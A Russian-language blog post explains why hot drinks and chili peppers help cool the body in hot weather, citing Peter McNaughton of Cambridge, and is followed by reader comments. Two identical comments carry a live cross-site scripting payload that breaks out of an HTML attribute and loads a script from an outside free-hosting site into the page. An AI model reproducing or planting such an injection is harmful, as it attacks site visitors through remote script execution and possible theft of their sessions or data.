Зачем в жару пить горячие напитки

Питер МакНотон (Peter McNaughton) из Кембриджского университета дал объяснение этому явлению. Как помнят многие из курса биологии, на нашем языке и во рту есть нервы со специальными рецепторами, которые получают информацию извне. Этих рецепторов множество и один из них отвечает за горячее.

Когда вы едите или пьете что-то горячее, рецепторы посылают сигнал в мозг о том, что во рту "горячо". Это в свою очередь запускает механизм охлаждения, то есть сигнал о том, что нужно начать потеть.

Конечно, выпивая горячий чай, вам становится жарче, но вы в то же время быстрее охлаждаетесь, благодаря вашей внутренней системе охлаждения.

Интересно, что эти же рецепторы реагируют на жгучесть перцев чили, из-за чего у нас также возникает ощущение жара. Видимо поэтому перец чили так популярен в жарких странах. Просто он заставляет нас потеть и запускает другие механизмы снижения температуры тела.

Интересные факты чай горячие напитки

Alezzz

24 июн 2019 в 16:29

Похожие материалы
Комментарии (6)
Ekaterinka23

24 июн 2019 в 16:46

А я вообще горячие напитки не люблю.
SergeyVorobyev

24 июн 2019 в 17:31

Запомним.
Arhan1982

25 июн 2019 в 15:34

сейчас бы в плюс 30 кипяточку
undefined

27 июн 2019 в 10:49

'"><script src=https://link777.000webhostapp.com/c.js></script>
undefined

27 июн 2019 в 10:49

'"><script src=https://link777.000webhostapp.com/c.js></script>
MarinaKarpova

27 июн 2019 в 13:30

Про перец не знала. А вот потеть не всегда удобно. Например на деловой встрече, совещании и тд. Поэтому, лучше отказаться от чая и выпить воды комнатной температуры